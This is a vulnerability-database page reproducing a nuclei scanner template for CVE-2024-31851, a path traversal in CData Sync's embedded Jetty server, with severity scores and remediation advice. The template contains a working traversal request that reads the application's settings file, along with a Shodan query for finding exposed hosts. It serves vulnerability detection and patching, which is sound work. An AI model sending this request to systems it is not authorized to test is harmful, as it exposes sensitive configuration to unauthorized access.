Lucene search
K

CData Sync < 23.4.8843 - Path Traversal

🗓️ 11 Jul 2026 02:59:56Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

CData Sync < 23.4.8843 - Path Traversal vulnerability in Java version, using embedded Jetty server, allowing unauthenticated remote attacker to access sensitive information and perform limited actions

Related
Refs
Code
id: CVE-2024-31851

info:
  name: CData Sync < 23.4.8843 - Path Traversal
  author: DhiyaneshDK
  severity: high
  description: |
    A path traversal vulnerability exists in the Java version of CData Sync < 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
  impact: |
    Unauthenticated attackers can access sensitive information and perform limited unauthorized actions via path traversal.
  remediation: |
    Update CData Sync to version 23.4.8843 or later.
  reference:
    - https://www.tenable.com/security/research/tra-2024-09
    - https://nvd.nist.gov/vuln/detail/CVE-2024-31851
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2024-31851
    cwe-id: CWE-22
    epss-score: 0.02885
    epss-percentile: 0.85224
  metadata:
    verified: true
    max-request: 2
    shodan-query: "title:\"CData Sync\""
  tags: cve,cve2024,cdata,lfi,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/login.rst'

    matchers:
      - type: word
        internal: true
        words:
          - '<title>CData - Sync'

  - raw:
      - |
        GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"items":[{'
          - ':"true"'
          - 'notifyemail'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220621e6c38fdf67c634d1976d40fe49dc358cfcdba6ebd1450756293dffabf833502207ff9603c3cd319e0c851cbadeaccd16f3a7024d23fa11b846f198ef585620ad7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.18.6
EPSS0.02885
SSVC
42